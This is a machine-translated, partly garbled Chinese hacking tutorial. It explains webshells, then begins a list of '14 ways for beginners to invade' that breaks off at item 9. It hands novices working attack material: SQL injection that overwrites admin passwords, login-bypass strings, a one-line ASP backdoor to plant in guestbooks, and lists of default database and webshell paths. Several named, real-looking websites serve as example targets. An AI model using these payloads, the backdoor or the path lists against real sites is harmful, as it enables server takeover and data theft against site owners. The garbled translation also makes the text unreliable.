A What is Webshell? This is a question that many friends are wondering about,
What is Webshell? Today we're going to talk about this topic!
Webshell is a scripting attack tool for Web intrusion.
Simply put, Webshell is an ASP or PHP Trojan back door, hackers in a Web site, often in these ASP or PHP Trojan door files in the Web site server, and normal Web files mixed together. Hackers can then use the Web way, through the ASP or PHP backdoor control of the Web server, including uploading and downloading files, viewing the database, executing arbitrary program commands. </P>
To better understand Webshell we learn two concepts:
What is a "Trojan horse"? "Trojan" full name is "Trojan Horse" (Trojan<br>horse), the original refers to the ancient Greek soldiers hidden in the Trojan into enemy cities to occupy enemy city story. On the internet, "Trojan Horse" refers to some program designers in their applications or games that can be downloaded from the network (Download), including programs that can control the user's computer system, which can cause users ' systems to be corrupted or even paralyzed.
What is the back door? As you all know, there are 65,535 ports on a computer, so if you think of a computer as a room, then the 65,535 ports can be viewed as the 65535 doors the computer opens to connect to the outside world. Behind each door is a service. Some doors are specially opened to greet guests (provide services), and some doors are the owner to go out to visit the guests and opened (access to remote services)--theoretically, the rest of the other doors should be closed, but for various reasons, many doors are open. So there are good people enter, the owner's privacy is spied on, life is disturbed, and even the house of things have been made a wolf trace. The door, which was quietly opened, was the back door.
Advantages of Webshell
The biggest advantage of Webshell is that it can traverse the firewall, because the data exchanged with the controlled server or remote host is passed through 80 ports, so it will not be blocked by the firewall. And the use of Webshell generally will not leave records in the system log, only in the Web site log left some data submission records, no experience of the administrator is difficult to see the traces of the invasion.
How to find Webshel:
1, script attack SQL injection <BR>
2, using injection tools <BR>
3, open Baidu in the browser, input search keyword "On this page operation does not need FSO support &" or "only one operation at a time", and then click Search, and soon you can see a large number of retrieved query results .<br> Other things, temporarily not much said, and then go deep, Prepare a topic every day, need is a great perseverance and efforts, we held a daily lecture is to popular easy to understand the popularization of information security knowledge, so that do not like to see the article, think that information security knowledge is very abstruse boring people understand, in fact, he only spend a little time, can know a lot of information security knowledge!
Two 14 Ways for beginners to learn to invade
Author: Anonymous article source: Site original hits: 560 Update Time: 2006-8-9
1. Upload a vulnerability [not much to say]
PS: If you see: Select the file you want to upload [upload] or appear "Please login after use", 80% there are loopholes!
Sometimes uploads are not necessarily successful, because cookies are different. We're going to use Wsockexpert to get cookies. And then upload it in domain.
2. Injection holes [Not much]
PS: MD5 password. Sometimes we are not easy to run out. If this is a [SQL database]. Then we can use the following command:
http://inject url; update admin set password= ' new MD5 password ' where password= ' old MD5 password '--[admin as table name.]
3. Side note, that is, Cross station.
When we invade a certain station may this station sturdy and unassailable, we can look for and this station same server's site, then uses this site to use the authority, the sniffing and so on the method to invade our to invade the site. , here is a difficult point, is that some of the server's absolute path is encrypted, it depends on our ability to
4. Bauku: The middle of the Level two catalogue/replace%5C
Ey:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
If you can see: ' E:\test\test\database\test.asa ' is not a valid path. Determine if the path name is spelled correctly, and whether to connect to the server where the file is stored.
This is the database. You can use FlashGet to change to. mdb format when downloading.
5. ' or ' = ' or ' This is a phrase that can be connected to SQL. You can enter the background directly. I collected it. There are also similar:
' or ' = ' "or" a "=" a ") or (' a ' = ' a") or ("a" = "a") or "a" = "a" or "a" = "a" = "1=1--"
6. Social engineering. We all know that. is to guess the solution.
7. Write to ASP format database. is a word trojan [<%execute request ("value")%>], commonly used in the message book.
Ey:http://www.scbzlx.com/book/book.asp[This is the ASP format database], and then write a word trojan
8. Source code use: Some sites are used to download the source of the Internet. Some stationmaster is very vegetable. Nothing is changed.
Ey:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
This station uses is: Outstanding alumni, the source code I have been down,
Default database/webshell path: \database\liangu_data.mdb admin: adm_login.asp Password and username
9. Default database/webshell Path utilization: A lot of such sites/benefits people webshell others.
/databackup/dvbbs7. Mdb
/bbs/databackup/dvbbs7. Mdb
/bbs/data/dvbbs7. Mdb
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
Tools: Website Hunter digging Chicken
Ey:http://www.cl1999.com/bbs/databackup/dvbbs7.mdb
Current 1/2 page
12 Next read the full text
